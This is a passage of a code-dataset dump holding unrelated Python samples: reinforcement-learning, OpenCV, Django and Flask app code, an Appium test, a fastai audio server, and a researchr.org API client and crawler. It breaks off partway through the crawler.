= self.preprocess_obss(state, device=self.device)\n next_obs = self.preprocess_obss(next_state, device=self.device)\n action = torch.LongTensor(action).to(device=self.device)\n reward = torch.FloatTensor(reward).to(device=self.device)\n done = torch.FloatTensor(done).to(device=self.device)\n\n q_values = self.base_model(obs)\n next_q_values = self.target_model(next_obs).detach()\n\n q_value = q_values.gather(1, action.unsqueeze(1)).squeeze(1)\n next_q_value = next_q_values.max(1)[0]\n expected_q_value = reward + (self.discount * next_q_value * (1 - done))\n\n # Compute Huber loss\n loss = F.smooth_l1_loss(q_value, expected_q_value)\n\n # Optimize the model\n self.optimizer.zero_grad()\n loss.backward()\n for param in self.base_model.parameters():\n param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n\n return loss\n\n\nclass ReplayBuffer(object):\n def __init__(self, capacity):\n self.buffer = deque(maxlen=capacity)\n\n def push(self, state, action, reward, next_state, done):\n state = np.expand_dims(state, 0)\n next_state = np.expand_dims(next_state, 0)\n\n self.buffer.append((state, action, reward, next_state, done))\n\n def sample(self, batch_size):\n state, action, reward, next_state, done = zip(*random.sample(self.buffer, batch_size))\n return np.concatenate(state), action, 
reward, np.concatenate(next_state), done\n\n def __len__(self):\n return len(self.buffer)\n","sub_path":"torch_rl/torch_rl/algos/new_algo.py","file_name":"new_algo.py","file_ext":"py","file_size_in_byte":11176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221070463","text":"from models import MonModel, change_time\nimport time\n\n\nclass Board(MonModel):\n \"\"\"\n __fields__ = [\n '_id',\n ('id', int, -1),\n ('type', str, ''),\n ('deleted', bool, False),\n ('created_time', int, 0),\n ('updated_time', int, 0),\n \"\"\"\n __fields__ = MonModel.__fields__ + [\n ('title', str, ''),\n ]\n\n @classmethod\n def update(cls, form):\n board_id = int(form.get('id', -1))\n whitelist = ['id', 'title']\n Board.ori_update(whitelist, board_id, form)\n","sub_path":"server_normal_Flask_beautiful/models/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80038822","text":"import cv2\r\nimg=cv2.imread(\"lz.jpg\")\r\n#cv2.COLOR_BGR2GRAY grayscale\r\n#cv2.IMREAD_COLOR color\r\n#cv2.COLOR_BGR2HSV\r\n#cv2.COLOR_BGR2LAB\r\ncv2.namedWindow(\"Image\")#create a window to display the image\r\nhsv=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)#convert BGR to HSV\r\nres=cv2.resize(hsv,(800,500),interpolation=cv2.INTER_CUBIC)\r\ncv2.imshow(\"Image\",res)\r\nk=cv2.waitKey(0)\r\nif k==27:\r\n cv2.destroyAllWindows()#release the windows\r\n","sub_path":"fristtry.py","file_name":"fristtry.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99258111","text":"from django.contrib.auth import get_user_model\nfrom django.utils.translation import ugettext as _\nfrom rest_framework import exceptions\nfrom rest_framework_jwt.authentication import BaseJSONWebTokenAuthentication, JSONWebTokenAuthentication\n\nfrom rest_framework_jwt.settings import api_settings\n\n\njwt_decode_handler = api_settings.JWT_DECODE_HANDLER\njwt_get_username_from_payload = api_settings.JWT_PAYLOAD_GET_USERNAME_HANDLER\n\n\nclass CustomJWTWebTokenAuthentication(BaseJSONWebTokenAuthentication):\n def authenticate_credentials(self, payload):\n \"\"\"\n Returns a user that matches the payload's user id and email unless it is not active or blocked.\n \"\"\"\n User = get_user_model()\n username = jwt_get_username_from_payload(payload)\n\n if not username:\n msg = _('Invalid payload.')\n raise exceptions.AuthenticationFailed(msg)\n\n try:\n user = User.objects.get_by_natural_key(username)\n except User.DoesNotExist:\n msg = _('Invalid signature.')\n raise exceptions.AuthenticationFailed(msg)\n else:\n if not user.is_active:\n msg = _('User account is disabled.')\n raise exceptions.AuthenticationFailed(msg)\n\n if user.is_blocked:\n msg = _('User account is currently blocked.')\n raise exceptions.AuthenticationFailed(msg)\n\n return user\n\n\nclass CustomJSONWebTokenAuthentication(CustomJWTWebTokenAuthentication, JSONWebTokenAuthentication):\n pass\n","sub_path":"pomodorr/auth/auth_classes.py","file_name":"auth_classes.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321257112","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport os\nimport sys\nsys.path.append(\"../../../../../../import\")\nimport setup\nimport element\nfrom random import randint\nfrom appium import webdriver\nfrom time import sleep\n\nclass SimpleIOSTests(unittest.TestCase):\n\n def setUp(self):\n # 
set up appium\n setup.load_for6(self)\n setup.ck_login_ordinary(self)\n sleep(1)\n\n def test_ordinary_otherset_case1(self):#原先密碼與新密碼皆未輸入\n element.livehome_element(self)\n self.info.click()\n sleep(2)\n element.livehome_info(self)\n self.other_set.click()\n sleep(1)\n element.other_set(self)\n self.login_value1 = int (self.multiple_devices.get_attribute('value')) +1\n if self.login_value1 > 1 :\n self.login_value1 = 0\n self.multiple_devices.click()\n sleep(1)\n self.pk_record_back.click()\n sleep(1)\n element.livehome_info(self)\n self.other_set.click()\n sleep(1)\n element.other_set(self)\n self.login_value2 = int (self.multiple_devices.get_attribute('value'))\n self.assertEqual(self.login_value1,self.login_value2)\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(SimpleIOSTests)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"pk_test/livehome/livehome_info/ordinary/ordinary_info/info_otherset/ordinary_otherset_case1.py","file_name":"ordinary_otherset_case1.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312928036","text":"#!/usr/bin/env python\n\ndef num_ways_x(n):\n if n == 0 : return 1\n total = 0\n for i in {1,2}:\n if (n -i)>=0 :\n total += num_ways_x(n-i)\n return total\n\ndef num_ways_x_bottom_up(n):\n\n if n == 0 : return 1\n nums = [0]*(n+1)\n nums[0]= 1\n\n for i in range (1,n+1):\n total = 0\n for j in [1,2,4]:\n if i-j >=0:\n #print(\"i-j\",i-j)\n print (nums[i-j])\n total += nums[i-j]\n print(total)\n nums[i] = total#nums[1]=1,nums[2]=1,nums[3]=\n return nums[n]\n\n\nprint(num_ways_x(4))\n\nprint (num_ways_x_bottom_up(4))\n","sub_path":"stairs.py","file_name":"stairs.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"264187058","text":"import aiohttp\nimport asyncio\nimport uvicorn\nimport ast\nimport numpy as np\nfrom fastai2 import *\nfrom fastai2.vision.all import *\nfrom fastai2_audio.core.all import *\nfrom fastai2_audio.augment.all import *\nfrom io import BytesIO\nfrom starlette.applications import Starlette\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.staticfiles import StaticFiles\n\n\nexport_file_url = 'https://storage.googleapis.com/fastai-export-bucket/export.pkl' # google cloud bucket\n#export_file_url = 'https://drive.google.com/uc?export=download&id=1NryOFwHs6T3HlkG_dsSCslWgcviRv4h-' # google drive\n\nexport_file_name = 'export.pkl'\n\nwith open('app/classes.txt', 'r') as f:\n classes = ast.literal_eval(f.read())\n\npath = Path(__file__).parent\n\napp = Starlette()\napp.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])\napp.mount('/static', StaticFiles(directory='app/static'))\n\n\nasync def download_file(url, dest):\n print(\"Attempting pkl file download\")\n print(\"url:\", url)\n print(\"dest:\", dest)\n if dest.exists(): return \"dest.exists()\"\n async with aiohttp.ClientSession() as session:\n print(\"async session\")\n async with session.get(url) as response:\n print(\"response\", response)\n data = await response.read()\n #print(\"data response\",data)\n with open(dest, 'wb') as f:\n print(\"writing data\")\n f.write(data)\n print(\"file\", f)\n\ndef get_file(r): return '../content/train_curated/'+r['fname']\ndef get_label(r): return r['labels'].split(',') # split labels 
on ','\n\nasync def setup_learner():\n await download_file(export_file_url, path/export_file_name)\n try:\n print(\"pkl file exists?:\", path/export_file_name, os.path.exists(path/export_file_name))\n print(\"dl pkl file size:\", Path(path/export_file_name).stat().st_size)\n print(\"loading learner...\")\n learn = load_learner(path/export_file_name)\n print(\"learner loaded\")\n return learn\n except RuntimeError as e:\n if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:\n print(e)\n message = \"\\n\\nThis model was trained with an old version of fastai and will not work in a CPU environment.\\n\\nPlease update the fastai library in your training environment and export your model again.\\n\\nSee instructions for 'Returning to work' at https://course.fast.ai.\"\n raise RuntimeError(message)\n else:\n raise\n\n\nloop = asyncio.get_event_loop()\ntasks = [asyncio.ensure_future(setup_learner())]\nlearn = loop.run_until_complete(asyncio.gather(*tasks))[0]\nloop.close()\n\n\n@app.route('/')\nasync def homepage(request):\n html_file = path / 'view' / 'index.html'\n return HTMLResponse(html_file.open().read())\n\n# method from https://github.com/aquietlife/whisp/blob/master/app/server.py\n@app.route('/analyze', methods=['POST'])\nasync def analyze(request):\n form = await request.form()\n bytes = await (form[\"file\"].read())\n wav = BytesIO(bytes) \n utc_time = str(int(time.time()))\n sound_file = \"tmp/sound_\" + utc_time + \".wav\"\n _,_,preds = learn.predict(sound_file)\n predictions = learn.dls.vocab[np.argwhere(preds > 0.3).squeeze()]\n return JSONResponse({'classifications': str(predictions)})\n\n\nif __name__ == '__main__':\n if 'serve' in sys.argv:\n uvicorn.run(app=app, host='0.0.0.0', port=5000, log_level=\"info\") # render\n #uvicorn.run(app=app, host='0.0.0.0', port=Port, log_level=\"info\") #heroku\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348973613","text":"import cv2\r\nimport os\r\n\r\n###to work with video cam on the device use 0 or -1 to point at resource\r\ncap = cv2.VideoCapture(0) #Video file path can also be used\r\n\r\n#to save the video captured, use cv2.VideoWriter\r\nfourcc= cv2.VideoWriter_fourcc(*'mp4v') #compression code used for video codec, eg avi, mp4 etc\r\nprint(fourcc) #for mp4v = 1983148141 this is the fourcc code\r\nout = cv2.VideoWriter('sample_output.mp4',fourcc, 20 , (640,480) )\r\n\r\nprint(cap.isOpened())\r\n\r\ntry:\r\n while cap.isOpened():\r\n ret, frame = cap.read()\r\n if ret == True:\r\n print(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n cv2.imshow(\"frame\", frame)\r\n out.write(frame)\r\n\r\n if cv2.waitKey(2) & 0xFF==ord('q'):\r\n break #waitKey waits for 2 sec for user key input, if not give takes -1, ord gets unicode of char\r\n else:\r\n print('stream_ended')\r\n break\r\nexcept:\r\n print('done with video')\r\n\r\ncap.release() #release hold on camera if specified\r\ncv2.destroyWindow('frame') #remove all display windows\r\nprint('done')\r\n","sub_path":"OpenCV_video_stream_read_write.py","file_name":"OpenCV_video_stream_read_write.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"292943424","text":"from django.core.exceptions import ValidationError\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib 
import messages\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Q\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView, ListView\nfrom .forms import CreateUserForm, CreateProfileForm, ListBookForm, MessageForm, AddRatingForm\nfrom .models import Book, Cart, Wishlist, Transaction, Rating, Profile, Message, Reported\nfrom .filters import BookFilter\n# Create your views here.\n\n\ndef userLog(request):\n return render(request, 'login.html')\n\ndef register(request):\n return render(request, 'signup.html')\n\ndef messaging(request):\n return render(request, 'messaging.html')\n\ndef hometemp(request):\n return render(request, 'hometemp.html')\n\ndef buyList(request):\n return render(request, 'buyerListing.html')\n\ndef logoutuser(request):\n logout(request)\n return redirect('../')\n\n#Each time a user is created, a cart and wishlist are also created\n@receiver(post_save, sender=User)\ndef createcartandwishlist(sender, instance, created, **kwargs):\n if created:\n Cart.objects.create(owner=instance)\n Wishlist.objects.create(owner=instance)\n Rating.objects.create(user=instance)\n\nclass HomePageView(ListView):\n model = Book\n template_name= 'search.html'\n\nclass SearchResultsView(ListView):\n model = Book\n template_name = 'searchresults.html'\n def get_queryset(self): # new\n query = self.request.GET.get('q')\n object_list = Book.objects.filter(\n Q(title__icontains=query) | Q(author__icontains=query) | Q(\n ISBN13__icontains=query) | Q(edition__icontains=query) | Q(\n condition__icontains=query) | Q(field__icontains=query))\n return object_list\n\n#This function is called when a user goes to create an account.\ndef signup(request):\n form = UserCreationForm()\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n raw_password = form.cleaned_data.get('password1')\n raw_email = form.cleaned_data.get('username')\n if 'bc.edu' in raw_email:\n user = form.save()\n user.save()\n user = authenticate(username=user.username, password=raw_password)\n login(request, user)\n return redirect('../profile/')\n else:\n messages.error(request,\"Please enter a valid BC email.\")\n return redirect('signup')\n else:\n form = CreateUserForm()\n return render(request, 'register.html', {'form': form})\n\n#This function is called when users go to create a profile after first signing up.\ndef createprofile(request):\n p_form = CreateProfileForm(initial={'user':request.user})\n if request.method == \"POST\":\n p_form = CreateProfileForm(request.POST)\n if p_form.is_valid():\n Profile = p_form.save(commit=False)\n Profile.user = request.user\n Profile = p_form.save()\n User = request.user\n User.save()\n cleanfirstname = p_form.cleaned_data.get('first_name')\n cleanlastname = p_form.cleaned_data.get('last_name')\n User.first_name = cleanfirstname\n User.last_name = cleanlastname\n User.email = User.username\n User.save()\n return redirect('../')\n else:\n form = CreateProfileForm()\n return render(request, 'createprofile.html', {'p_form':p_form})\n\n#This function is called when the user goes to create a book listing. 
The ISBN number is confirmed.\n@login_required\ndef createlisting(request):\n newlistingform = ListBookForm(initial={'user':request.user})\n if request.method == \"POST\":\n newlistingform = ListBookForm(request.POST, request.FILES)\n if newlistingform.is_valid():\n isbnone = newlistingform.cleaned_data['ISBN13']\n isbntwo = newlistingform.cleaned_data['ISBN13Conf']\n if (isbnone == isbntwo):\n newlistingform = newlistingform.save(commit=False)\n newlistingform.user = request.user\n newlistingform = newlistingform.save()\n messages.success(request, \"Success! Your book has been listed!\")\n return redirect('../')\n elif (isbnone!=isbntwo):\n messages.success(request, \"Make sure ISBN13 fields match.\")\n return redirect('newlisting')\n return render(request, 'sellerListing.html', {'ListBookForm':ListBookForm})\n\n#This function is related to viewing all available books and filtering based on user input.\ndef searchbooks(request):\n allbooks = Book.objects.all()\n myFilter = BookFilter(request.GET, queryset=allbooks)\n allbooks = myFilter.qs\n context = {'books':allbooks,'filter': myFilter,}\n return render(request, 'searchfilter.html', context)\n\ndef changeOrdering(request):\n allbooks = Book.objects.all()\n myFilter = BookFilter(request.GET, queryset=allbooks)\n allbooks = myFilter.qs\n context = {'books': allbooks, 'filter': myFilter}\n return render(request, 'searchfilter2.html', context)\n\n\n##These functions are related to the cart and wishlist:\n #adding to cart\n #adding to wishlist\n #changing from wishlist to cart\n #viewing wishlist\n #viewing cart\n\n@login_required\ndef addtocart(request, bookid):\n booktoadd = Book.objects.get(uuid=bookid)\n cart, created = Cart.objects.get_or_create(owner=request.user)\n cart.cartitem.add(booktoadd)\n cart.save()\n messages.success(request, \"Success! A book has been added to the cart!\")\n return redirect('search')\n\n@login_required\ndef addtowishlist(request, bookid):\n booktoadd = Book.objects.get(uuid=bookid)\n wishlist, created = Wishlist.objects.get_or_create(owner=request.user)\n wishlist.item.add(booktoadd)\n wishlist.save()\n messages.success(request, \"Success! A book has been added to your wishlist!\")\n return redirect('search')\n\n@login_required\ndef viewcart(request):\n currentcart = Cart.objects.get(owner=request.user)\n context = {'cart': currentcart}\n return render(request, 'cart.html', context)\n\n@login_required\ndef viewwishlist(request):\n currentwishlist = Wishlist.objects.get(owner=request.user)\n context = {'wishlist': currentwishlist}\n return render(request, 'wishlist.html', context)\n\n@login_required\ndef switchfromwishlisttocart(request, bookid):\n booktoswitch = Book.objects.get(uuid=bookid)\n currentwishlist = Wishlist.objects.get(owner = request.user)\n currentcart = Cart.objects.get(owner = request.user)\n currentwishlist.item.remove(booktoswitch)\n currentcart.cartitem.add(booktoswitch)\n messages.success(request, \"Success! A book from your wishlist has been added to your cart.\")\n return redirect('cart')\n\n@login_required\ndef removefromcart(request, bookid):\n booktoremove = Book.objects.get(uuid=bookid)\n cart, created = Cart.objects.get_or_create(owner=request.user)\n cart.cartitem.remove(booktoremove)\n cart.save()\n messages.success(request, \"Success! 
A book has been removed from your cart!\")\n return redirect('cart')\n\n@login_required\ndef removefromwishlist(request, bookid):\n booktoremove = Book.objects.get(uuid=bookid)\n wishlist, created = Wishlist.objects.get_or_create(owner=request.user)\n wishlist.item.remove(booktoremove)\n wishlist.save()\n messages.success(request, \"Success! A book has been removed from your wishlist!\")\n return redirect('wishlist')\n\n#These two functions have to deal with the user viewing their own book listings and removing if necessary.\n@login_required\ndef viewmyprofile(request):\n mycurrentbooks = Book.objects.filter(user = request.user)\n myprofile = Profile.objects.get(user = request.user)\n myratings = Rating.objects.get(user = request.user)\n myrecommendations = Book.objects.filter(field = myprofile.field)[0:3]\n context = {'mycurrentbooks':mycurrentbooks, 'myprofile':myprofile, 'myrecommendations':myrecommendations, 'myratings':myratings}\n return render(request, 'myprofile.html', context)\n\n@login_required\ndef removelisting(request, bookid):\n booktoremove = Book.objects.get(uuid=bookid)\n booktoremove.delete()\n messages.success(request, \"Success! Your book has been successfully removed from listings.\")\n return redirect('myprofile')\n\n\n@login_required\ndef reportedbook(request,bookid):\n booktoreport = Book.objects.get(uuid=bookid)\n userreporting = request.user\n userreported = booktoreport.user\n new_report = Reported(reporter = userreporting, reported = userreported, reportedbook = booktoreport)\n new_report.save()\n booktoreport.reported = True\n booktoreport.save()\n messages.success(request, \"Thank you! This book has been reported. An admin may follow up with you if more information is needed.\")\n return redirect('searchfilter')\n\ndef reporteduser(request,transactionid):\n reportattransaction = Transaction.objects.get(uuid=transactionid)\n booktoreport = Book.objects.get(uuid=reportattransaction.book.uuid)\n userreporting = request.user\n userreported = booktoreport.user\n new_report = Reported(reporter = userreporting, reported = userreported, reportedtransaction=reportattransaction)\n new_report.save()\n booktoreport.reported = True\n booktoreport.save()\n reportattransaction.buyerhasrated = True\n reportattransaction.sellerhasrated = True\n reportattransaction.status = 'Completed'\n reportattransaction.save()\n messages.success(request, \"Thank you! This user has been reported. An admin may follow up with you if more information is needed.\")\n return redirect('viewmytransactions')\n\n\n#This function is called when the user goes to message the user from the cart. It will create a transaction instance.\n@login_required\ndef createtransaction(request, bookid):\n newtransaction = Transaction.objects.create(buyer=request.user, book=Book.objects.get(uuid=bookid), seller=Book.objects.get(uuid=bookid).user)\n booktoremove = Book.objects.get(uuid=bookid)\n cart, created = Cart.objects.get_or_create(owner=request.user)\n cart.cartitem.remove(booktoremove)\n cart.save()\n messages.success(request, \"Success! You have messaged the owner and have created a transaction. 
This item will be removed from your cart.\")\n return redirect('viewtransactionmessages', selleruser=booktoremove.user, buyeruser=request.user, transactionid=newtransaction.uuid)\n\n@login_required\ndef viewmytransactions(request):\n transactionsasseller = Transaction.objects.filter(seller=request.user) #get all transactions where the current user is the seller\n transactionsasbuyer = Transaction.objects.filter(buyer=request.user) #get all transactions where the current user is the buyer\n context = {'transactionsasseller':transactionsasseller, 'transactionsasbuyer':transactionsasbuyer}\n return render(request, 'mytransactions.html', context)\n\n@login_required\ndef viewtransactionmessages(request, selleruser, buyeruser, transactionid):\n transactiontoview = Transaction.objects.get(uuid=transactionid)\n messagesseller = User.objects.get(username=selleruser)\n messagesbuyer = User.objects.get(username=buyeruser)\n messages = Message.objects.filter(transaction__in=Transaction.objects.filter(seller=messagesseller).filter(buyer=messagesbuyer)).order_by('creation_time')\n\n if messagesseller == request.user:\n notcurrentuser = messagesbuyer\n else:\n notcurrentuser = messagesseller\n\n newmessageform = MessageForm()\n if request.method==\"POST\":\n newmessageform=MessageForm(request.POST)\n if newmessageform.is_valid():\n newmessageform = newmessageform.save(commit=False)\n newmessageform.sender = request.user\n newmessageform.recipient = notcurrentuser\n newmessageform.transaction = transactiontoview\n newmessageform = newmessageform.save()\n return redirect('viewtransactionmessages', selleruser=messagesseller, buyeruser=messagesbuyer, transactionid=transactiontoview.uuid)\n context={'transactionmessages':messages, 'transaction':transactiontoview, 'form':newmessageform}\n return render(request, 'transactionmessages.html', context)\n\n\n@login_required\ndef createmessage(request):\n newmessageform = MessageForm()\n if request.method == \"POST\":\n newmessageform = MessageForm(request.POST)\n if newmessageform.is_valid():\n newmessageform = newmessageform.save(commit=False)\n newmessageform.sender = request.user\n newmessageform = newmessageform.save()\n return render(request, 'messages.html', {'MessageForm':MessageForm})\n\n@login_required\ndef donewithtransaction(request, doneusername, transactionid):\n doneuser = User.objects.get(username=doneusername)\n \n transaction = Transaction.objects.get(uuid=transactionid)\n if doneuser==transaction.buyer:\n transaction.buyerhasrated = True\n transaction.save()\n else:\n transaction.sellerhasrated = True\n transaction.save()\n\n if transaction.buyerhasrated and transaction.sellerhasrated:\n #transaction is complete, mark book as sold\n booktomarkassold = transaction.book \n booktomarkassold.sold = True\n booktomarkassold.save()\n\n if doneuser==transaction.buyer:\n addratingform = AddRatingForm()\n if request.method == \"POST\":\n addratingform = AddRatingForm(request.POST)\n if addratingform.is_valid():\n addedrating = addratingform.cleaned_data['addedrating']\n usertoupdate = User.objects.get(username=transaction.seller)\n currentusersellerrating = float(Rating.objects.get(user=usertoupdate).sellerrating)\n currentnumberofsellerratings = float(Rating.objects.get(user=usertoupdate).numberofsellerratings)\n Rating.objects.filter(user=usertoupdate).update(sellerrating=((currentnumberofsellerratings*currentusersellerrating)+(addedrating))/(currentnumberofsellerratings+1)) #(9*(5.0)+1*(3.0))/10\n 
Rating.objects.filter(user=usertoupdate).update(numberofsellerratings=currentnumberofsellerratings+1)\n messages.success(request, \"Thank you for rating this user!\")\n return redirect('viewmytransactions')\n else:\n addratingform = AddRatingForm()\n if request.method == \"POST\":\n addratingform = AddRatingForm(request.POST)\n if addratingform.is_valid():\n addedrating = addratingform.cleaned_data['addedrating']\n usertoupdate = User.objects.get(username=transaction.buyer)\n currentuserbuyerrating = float(Rating.objects.get(user=usertoupdate).buyerrating)\n currentnumberofbuyerratings = float(Rating.objects.get(user=usertoupdate).numberofbuyerratings)\n Rating.objects.filter(user=usertoupdate).update(buyerrating=((currentnumberofbuyerratings*currentuserbuyerrating)+(addedrating))/(currentnumberofbuyerratings+1)) #(9*(5.0)+1*(3.0))/10\n Rating.objects.filter(user=usertoupdate).update(numberofbuyerratings=currentnumberofbuyerratings+1)\n messages.success(request, \"Thank you for rating this user!\")\n return redirect('viewmytransactions')\n\n return render(request, 'addrating.html', {'form':addratingform})","sub_path":"bookbargains/bbapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"523374174","text":"import json\n# -*- coding: utf-8 -*-\nimport httplib\nimport random\nimport time\nimport re\nfrom exceptions import *\n\n\nclass ResearchrClass:\n def __init__(self):\n self.conn = None\n self.encoding = \"UTF-8\"\n self.firstLimitMin = 0.9\n self.firstLimitMax = 2.5\n self.secondLimitMin = 70\n self.secondLimitMax = 100\n self.thirdLimitMin = 500\n self.thirdLimitMax = 600\n self.filename = None\n self.userAgents = [\"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1\",\n \"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0\",\n \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.790.0 Safari/535.1\",\n \"Opera/6.01 (Windows XP; U) [de]\",\n \"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63\",\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; de) Opera 8.02\",\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.50 [en]\",\n \"Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5\",\n \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17\"\n ]\n \n def searchPublications(self, key, index):\n \"\"\"\n Search publications on researchr.org.\n\n @type key: string\n @param key: The search term.\n @type index: number\n @param index: The page of results.\n @rtype: dict\n @return: Index, kind of search, array of results and the search term.\n \"\"\"\n data = self.__makeRequest(\"search/publication\", key, index)\n return self.__decode(data)\n\n def searchConferences(self, key, index):\n \"\"\"\n Search conferences on researchr.org.\n\n @type key: string\n @param key: The search term.\n @type index: number\n @param index: The page of results.\n @rtype: dict\n @return: Index, kind of search, array of results and the search term.\n \"\"\"\n data = 
self.__makeRequest(\"search/conference\", key, index)\n return self.__decode(data)\n \n def getPublication(self, key):\n \"\"\"\n Get the publication from researchr.org.\n\n @type key: string\n @param key: The name of a publication, which we want to find the record.\n @rtype: dict\n @return: Detail informations of publication.\n \"\"\"\n data = self.__makeRequest(\"publication\", key, \"\")\n return self.__decode(data)\n \n def getPerson(self, key):\n \"\"\"\n Get the person (author) from researchr.org.\n\n @type key: string\n @param key: The name of a person, which we want to find the record.\n @rtype: dict\n @return: Detail informations of person.\n \"\"\"\n data = self.__makeRequest(\"person\", key, \"\")\n return self.__decode(data)\n \n def getBibliography(self, key):\n \"\"\"\n Get the bibliography from researchr.org.\n\n @type key: string\n @param key: The name of a bibliography, which we want to find the record.\n @rtype: dict\n @return: Detail informations of bibliography.\n \"\"\"\n data = self.__makeRequest(\"bibliography\", key, \"\")\n return self.__decode(data)\n \n def __makeRequest(self, term, key, index):\n \"\"\"\n Make request to researchr.org for get content.\n\n @type term: string\n @param term: The name of service.\n @type key: string\n @param key: The search term.\n @rtype: string\n @return: Data in JSON format.\n \"\"\"\n if not index==\"\":\n try:\n int(index)\n except:\n raise ValueError(\"Index parameter must be a number\")\n self.conn = httplib.HTTPConnection(\"researchr.org\")\n self.conn.request(\"GET\", \"/api/%s/%s/%s\" % (term, key, index))\n res = self.conn.getresponse()\n if res.status != 200:\n raise HTTPStatusException(\"Page return error code %d: %s\" % (res.status, res.reason))\n data = res.read()\n return data\n \n def __decode(self, data):\n \"\"\"\n Decode data.\n\n @type data: string\n @param data: Data you want to decode.\n @rtype: dict\n @return: Decoded data (clear dict format).\n \"\"\"\n self.conn.close()\n return json.loads(data.decode(self.encoding))\n\n def __searchUsefulUrls(self, urls, rootUrl):\n \"\"\"\n Search for usefull urls. 
If cycle found next page of urls it call itself.\n If cycle found url of person, it call itself too.\n If cycle found publication, it save this publication into file.\n\n @type urls: dict\n @param urls: List of urls from which we get only the applicable.\n @type rootUrl: string\n @param rootUrl: Root url from which we began to look for.\n \"\"\"\n refFound = 0\n for url in urls:\n # search for next url\n if \"/explore/authors/1/\" in url and \"researchr.org/\" not in url and url not in rootUrl:\n print(\"Nasel jsem dalsi uroven: %s\" % url)\n refFound = 1\n urls = self.__getUrlsFromPage(url)\n self.__searchUsefulUrls(urls, url)\n\n # search for people\n elif \"/alias/\" in url and \"advised\" not in url and \"researchr.org/\" not in url and \"/alias/\" not in rootUrl and refFound == 0:\n print(\"Nasel jsme alias: %s\" % url)\n urls = self.__getUrlsFromPage(url)\n self.__searchUsefulUrls(urls, url)\n\n # search for publications\n elif \"/publication/\" in url and \"researchr.org/\" not in url:\n print(\"Nasel jsem publikaci: %s\" % url)\n with open(self.filename, \"ab\") as myFile:\n myFile.write(url.replace(\"/publication/\",\"\")+ \";\")\n\n def __getUrlsFromPage(self,url):\n \"\"\"\n Search for urls on page.\n\n @type url: dict\n @param url: Url of page where we want to find urls.\n @rtype: dict\n @return: List of urls.\n \"\"\"\n req = urllib2.Request(\"http://researchr.org%s\" % url)\n req.add_header('User-agent', self.userAgents[random.randint(0, 11)])\n try:\n resp = urllib2.urlopen(req) \n except:\n try:\n time.sleep(random.uniform(self.secondLimitMin, self.secondLimitMax))\n req = urllib2.Request(\"http://researchr.org%s\" % url)\n req.add_header('User-agent', self.userAgents[random.randint(0, 11)])\n resp = urllib2.urlopen(req)\n except:\n time.sleep(random.uniform(self.thirdLimitMin, self.thirdLimitMax))\n try:\n req = urllib2.Request(\"http://researchr.org%s\" % url)\n req.add_header('User-agent', self.userAgents[random.randint(0, 11)])\n resp = urllib2.urlopen(req)\n except:\n print(\"Error in url: %s\" % url)\n try:\n content = resp.read()\n except:\n print(\"Error in url: %s\" % url)\n time.sleep(random.uniform(self.firstLimitMin, self.firstLimitMax))\n urls = 